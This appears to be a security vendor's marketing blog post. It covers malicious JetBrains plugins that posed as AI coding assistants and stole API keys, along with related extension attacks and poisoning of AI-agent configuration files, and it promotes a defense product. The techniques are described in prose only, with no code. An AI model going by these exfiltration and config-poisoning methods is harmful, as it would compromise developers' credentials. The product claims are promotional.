15 malicious plugins on the official JetBrains Marketplace, posing as DeepSeek and CodeGPT AI coding assistants, quietly exfiltrated developers' AI provider API keys. Two of them — CodeGPT AI Assistant and DeepSeek AI Assist — passed 25,000 downloads each. The moment a developer pasted an OpenAI, DeepSeek, or SiliconFlow key into the plugin settings, it was shipped in plaintext HTTP to an attacker server. The keys were then resold — on the victims' bill.
What happened
The plugins were fully functional: chat, commit messages, code review, bug finding, unit tests. That's the point — they worked, so nobody looked twice. Underneath, a covert exfiltration path read the API-key field from the settings panel and POSTed it to a hardcoded endpoint over cleartext HTTP. No CVE, no software flaw — just trust abuse and supply chain.
In the same week, two "PromptSnatcher" Chrome ad-blocker extensions (100,000+ combined installs since 2022) were caught recording conversations from ChatGPT, Claude, Gemini, Copilot, Perplexity, and Grok — genuine ad-blocking as cover, conversation scraping underneath.
This is the exact threat class RuntimeAI Coding Agent Defense was built to detect, vet, and block — more on how below.
This isn't isolated — the AI coding surface is under sustained attack
The JetBrains campaign is the latest of many. The VS Code / Cursor / JetBrains extension ecosystem went from near-zero malicious activity to a steady stream of credential-stealing, source-exfiltrating, and self-propagating attacks in roughly 18 months:
- Nx Console (May 2026): attackers used a stolen contributor token to publish a malicious version of the popular Nx Console extension. The payload harvested cloud, CI/CD, and AI-coding-assistant credentials and exfiltrated ~3,800 internal GitHub repositories. (StepSecurity)
- 1.5M-install AI extensions (Jan 2026): two extensions marketed as AI coding assistants on the official VS Code Marketplace silently exfiltrated developer source code to remote servers — 1.5 million combined installs before exposure. (The Hacker News)
- GlassWorm (Oct 2025 → 2026, five waves): the first self-propagating VS Code extension worm — invisible-Unicode payloads that disappear from code review, Solana-based C2, harvesting NPM/GitHub/Git credentials and 49 crypto-wallet extensions. (Truesec)
- AI-agent config poisoning:
.cursorrulespoisoning, hidden instructions inCLAUDE.md, MCP-server injection, and AI-assistant SessionStart hooks have moved from theoretical to confirmed delivery mechanisms. (Phoenix Security) - The trend: Microsoft removed 110 malicious extensions from the VS Code Marketplace in 2025, with detections roughly quadrupling year over year. (Visual Studio Magazine)
Different payloads, one pattern: the IDE extension is now a first-class supply-chain target — and the thing it reaches for is your developers' credentials, source, and AI-provider keys.
Why this surface is so exposed
AI coding assistants exploded across enterprises in the last 18 months; governance didn't follow. A plugin runs with the developer's full privileges and holds a long-lived key to your most expensive accounts. And most security teams have zero inventory of which AI plugins and extensions their developers installed — you can't govern what you can't see.
The root cause is not "a bad plugin." It's a long-lived, all-powerful secret pasted into an untrusted tool.
The honest part: what governance can't do
Let's be straight, because the easy marketing answer ("we'd have stopped it") isn't true for anyone. No platform stops a developer from installing a plugin from an official marketplace — that's endpoint and MDM territory. RuntimeAI is not an EDR or a marketplace gatekeeper.
But the breach didn't happen because of the install. It happened because of what the plugin could steal. Change that, and the attack collapses.
What changes the outcome: RuntimeAI Coding Agent Defense
RuntimeAI Coding Agent Defense is built for exactly this attack class — it takes AI Discovery from inventory-only ("we see the plugin") to detect-vet-and-block ("this plugin is malicious, here's why, and we stopped it"). Five layers:
Most Advanced AI Security Discover · Vet · Block · Contain · Prove
- Discover / See it. RuntimeAI Discovery surfaces every AI plugin, MCP connection, and coding assistant installed across your developers — the shadow AI you can't govern if you can't see. You learn from your own dashboard, not a vendor breach notice.
- Vet it. RuntimeAI Coding Agent Defense scans the plugin's code (VS Code/Cursor JS, JetBrains JVM, Python agents) for the exact pattern in this attack — a credential field read and sent over cleartext HTTP — plus hardcoded exfil endpoints, obfuscation, and IOC matches against STIX/TAXII feeds.
- Make the prize worthless. With the Secure LLM Router + QuantumVault / PQ TokenVault, developers and agents draw short-lived, scoped, identity-bound tokens from a vault — they never hold the raw provider key. A plugin that steals "the key" steals a revocable, low-blast-radius token, not a blank check on your OpenAI account.
- Block & contain. Enforced IDE egress blocks plaintext exfil to non-allowlisted endpoints (fail-closed). On a confirmed-malicious verdict, the agent identity is kill-switched, its vaulted tokens revoked, and the endpoint quarantined via your MDM/EDR.
- Prove it. Every verdict and action lands in a tamper-proof, post-quantum-signed Merkle audit trail — forensics in minutes, not months.
Where RuntimeAI Coding Agent Defense draws the line
We tell every customer exactly where the boundary is: RuntimeAI Coding Agent Defense doesn't block the OS-level install — we detect, vet, block the exfil, and push the verdict to your MDM/EDR (Intune, Jamf, CrowdStrike) to quarantine. We ingest standard threat-intel feeds; we don't run a threat-research shop. The truthful ceiling is caught and neutralized before damage, not the plugin can never land on the machine.
That's the bet behind RuntimeAI Coding Agent Defense: identity for every agent, zero-trust enforcement at the point of action, and defence-in-depth with post-quantum-safe data security underneath. We'll say it plainly: we built one of the best identity stacks out there — and we still tell every customer it's the front door, not the whole house. RuntimeAI Coding Agent Defense is what locks the rest of it.
See the malicious plugin before it sees your keys.
RuntimeAI Coding Agent Defense detects, vets, and blocks malicious AI coding plugins and browser extensions — across VS Code, Cursor, and JetBrains. Get the AI Security Weekly briefing for the threats that matter.